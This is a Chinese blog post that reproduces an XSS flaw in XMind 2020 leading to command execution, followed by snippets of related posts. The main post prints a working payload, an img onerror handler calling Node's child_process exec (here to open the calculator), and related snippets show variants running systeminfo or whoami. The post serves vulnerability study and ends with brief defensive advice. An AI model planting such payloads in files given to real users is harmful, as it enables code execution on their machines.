xmind2020xss漏洞复现

最新推荐文章于 2024-02-20 11:06:07 发布
最新推荐文章于 2024-02-20 11:06:07 发布
阅读量520 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46171781/article/details/116611392
版权

今天看到某数字漏洞平台公布的xmind漏洞,尝试复现一下

一、复现环境

使用软件为xmind2020版本,可以在xmind官网(https://www.xmind.cn/)进行下载
版本

二、复现过程

1.创建一个思维导图,内容中写入payload
创建内容

2.进入大纲选项,选中内容按功能键,如shift、ctrl、alt、win键

实现1
3.进一步利用漏洞进行命令执行(payload来自于https://mp.weixin.qq.com/s/NjrycY4TxEz_vV83prNBzw),成功弹出计算器。payload如下:

<img src=x onerror="const exec = require('child_process').exec;exec('calc').stdout.on('data', function (data) {alert(data);})">

实现2

三、防范方面

1.及时更新软件版本
2.不要随便打开来源不明的思维导图

白芷th
关注
专栏目录
XMind漏洞xss复现(最全payload图文教程)
weixin_51387754的博客
05-18 425
https://mp.weixin.qq.com/s/gunmk1ox62sg2ifmVLFy7A
XMind 2020 XSS漏洞复现
遇事不决冲冲冲
05-25 2276
一.前言 漏洞危害:可以花样构造相关参数,执行系统命令,获取用户权限,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害,我看网上相关复现文章都贴着这句话,其实也就是这样的,XMind xss漏洞的确可以被利用执行一些像弹窗,执行命令(经典ipconfig命令,弹计算器),以及配合cs的使用,如果真的有有心人去利用这个漏洞的话,也是很容易中招的。下面放上下载地址。 下载地址下载XMind 2020版本 二.漏洞利用 1.xss弹窗 创建 写入命令 在思维导图红色部分(不止红
XMind 2020/2021 beat版本xss漏洞复现
yangbz123的博客
05-12 629
XMind概述 XMind 是一款非常实用的商业思维导图软件,应用全球最先进的Eclipse RCP 软件架构,全力打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、稳定性和性能,致力于使用先进的软件技术帮助用户真正意义上提高生产率。 漏洞利用 ##证明xss payload <img src=x onerror=alert(/hack/)> ##代码执行payload require('child_process').exec('systeminfo',(error, stdout,
Xmind 2020 XSS漏洞导致命令执行漏洞复现
Jaky5320的博客
05-10 315
0x00简介:       XMind是一个挺不错的思维导图软件,某数字漏洞云公众号在今天2021-05-10 10:22:29发布了漏洞预警信息,我立马找复现环境。下载地址:https://www.xmind.cn/0x01:复现:环境:1、XSS复现2、命令执行漏洞复现:0x02:预防:       1、升级到最新版本    2、谨慎打开Xmind &nb
xmind漏洞
qq_23690313的博客
12-14 2692
XMind 目录 一、 项目概要 1 二、 测试过程 1 (一) 制定实施方案: 1 (二) 风险规避: 1 (三) 测试过程: 2 (四) 整改加固建议: 4 三、 渗透测试方法 5 (一) RCE漏洞 5 (二) Cobalt Strike 5 四、 渗透测试范围 6 一、项目概要 (一)项目背景:2021年5月10日,360漏洞云监测到Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。 (二)实验目标:主要通过渗透测试的方式,发现和总结
Xmind2020存在XSS导致命令执行漏洞复现
m0_48520508的博客
05-19 533
0x00介绍 XMind 是一款非常实用的商业思维导图软件,应用全球最先进的Eclipse RCP 软件架构,全力打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、稳定性和性能,致力于使用先进的软件技术帮助用户真正意义上提高生产率。 0x01漏洞概述 该漏洞可以花样构造相关参数,执行系统命令,获取用户权限,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害 0x02影响版本 Xmind 2020 0x03环境搭建 1、下载漏洞环境,使用软件为xmind2020版本,可自.
XMind 2020 xss漏洞导致远程代码执行
jelly
05-14 511
0x00 简介 2021年5月10日,360漏洞云监测到Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。 影响版本: XMind 2020/2021 beat版本 0x01 复现环境 系统:普通的 win10 XMind 版本:XMind-2021-for-Windows-64bit-11.0.0-Beta1-202105061920 此外还测试了 XMind 2020 windows和macOS 版本均存在该漏洞复现记录时间:2021
Electron审计入门知识铺垫
jelly
06-24 1256
前言 最近被 XMind 2020 XSS 导致远程代码执行的漏洞所吸引,复现过程比较简单,于是想研究一下漏洞造成的原因,因为 XMind 属于 electorn 应用,应用了很多 Web 前端技术,然后就发现自己什么也看不懂。所以后面收集了很多知识,构成了这篇文章,相信看完这篇文章后,大家会对 electorn 审计会有大概的思路。 Electron的安全策略 nodeIntegration nodeIntegration 是用来隔离不受信任的资源,如来自不受信任的远程服务器的代码在本地被执行,将会造成安
[代码审计]青云客Cms前台有条件注入至getshell,后台xss至getshell、至弹你一脸计算器...
weixin_30791095的博客
12-15 273
之前写了一篇关于青云客cms的文章,发在了t00ls,就不copy过来了。 给个链接,好记录一下。 https://www.t00ls.net/thread-43093-1-1.html 转载于:https://www.cnblogs.com/r00tuser/p/8044025.html...
基础漏洞系列(二)——XSS
柠檬木有枝
01-13 326
https://github.com/jlkl/Basic_vulnerability/blob/master/XSS%E8%84%91%E5%9B%BE_19_8.mindmap.xmind
两步解决XMind打不开的问题
热门推荐
李英俊小朋友
12-21 2万+
两步解决XMind打不开的问题 写在前面 做这件事的原因: 对XMind进行神秘处理之后,发现XMind就打不开了 然后我研究了半天,发现在XMind.ini中把-javaagent:D:\XMind\XMindCrack.jar这行删掉就没问题 如果有错别字呢,哪里写错了呢,请在评论区告诉我嗷,同时,可能会有一些奇奇怪怪的符号夹在文字中,这是因为我用的是MarkDown语法,其中一些符号可能在这个平台(比如CSDN)不支持呢。 解决方案 把你的XMindCrack.jar放到安装目录下,我是
漏洞复现】Exrick-XMall-开源商城-SQL注入漏洞
最新发布
知黑而守白
02-20 113
XMail是一个基于SOA架构的分布式电商购物商城,前后端分离。该系统/item/list、/item/listSearch、/sys/log、/order/list、/member/list、/member/list/remove等多处接口存在SQL注入漏洞,会造成数据泄露。
XSS是什么?(Xmind配文详解)
weixin_55832111的博客
03-27 1万+
一张图带你详解XSS (话不多说上图) 一、什么是 XSS XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。 (是不是有人就会有疑问了,缩写不应该是CSS吗?因为CSS(层叠样式表)是一种用来表现文件样式的计算机
CSDN用户数据库泄露事件给我们的启示
suoyihen
12-24 696
知道CSDN用户数据库泄露这件事情是在12月21日晚上八九点的时候,那时候正在整理第二天报告要用到的思维导图,大奎告诉我说CSDN的用户密码都被泄露了,刚开始还不相信,不过当我从网上下载CSDN数据库文件,并看到自己的账户和密码时,我信了,并且心惊了一下,本来想着对自己的密码立刻进行修改,但网站采取了紧急措施,关闭了相应的功能,或许是为了防止别人恶意修改吧. 此次事件在互联网上引起了...
XMind-XSS-V8内核命令执行复现
Adminxe的博客
05-11 248
0x00 前言 测试环境: XMind 202005082128 0x01 payload(需要在大纲板块进行触发) <img src=x onerror="const exec = require('child_process').exec;exec('whoami').stdout.on('data', function (data) {alert(data);})"> 0x02 触发键 shift control option command 0x03 漏..
漏洞信息收集
温柔小薛的博客
03-29 2801
漏洞信息收集 注:这是从xmind笔记下导入过来的,排版可能很乱,后期我会整理,请见谅 本文目录漏洞信息收集主域名及二级域名探测(总概括)域名探测子域名探测备案号查询google HACK信息探测子域名探测敏感信息收集(1)敏感信息收集(2)邮箱信息收集社工库历史漏洞收集工具信息收集常见指纹识别方式资产梳理fofa及nmap使用 主域名及二级域名探测(总概括) 域名探测 要对一个站点进行渗透测...
逆向漏洞-入门二进制漏洞分析脑图
Coisini的博客
05-27 1208
XSS思维导图
u011975363的专栏
12-24 501
好记性不如烂笔头
xmind2020安装目录
09-16
XMind 2020的安装目录是用户选择安装XMind 2020时所指定的目录。在安装XMind 2020之前,用户需要下载安装程序,并运行该程序。运行程序后,用户将看到一个安装向导,该向导将引导用户完成XMind 2020的安装过程。 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值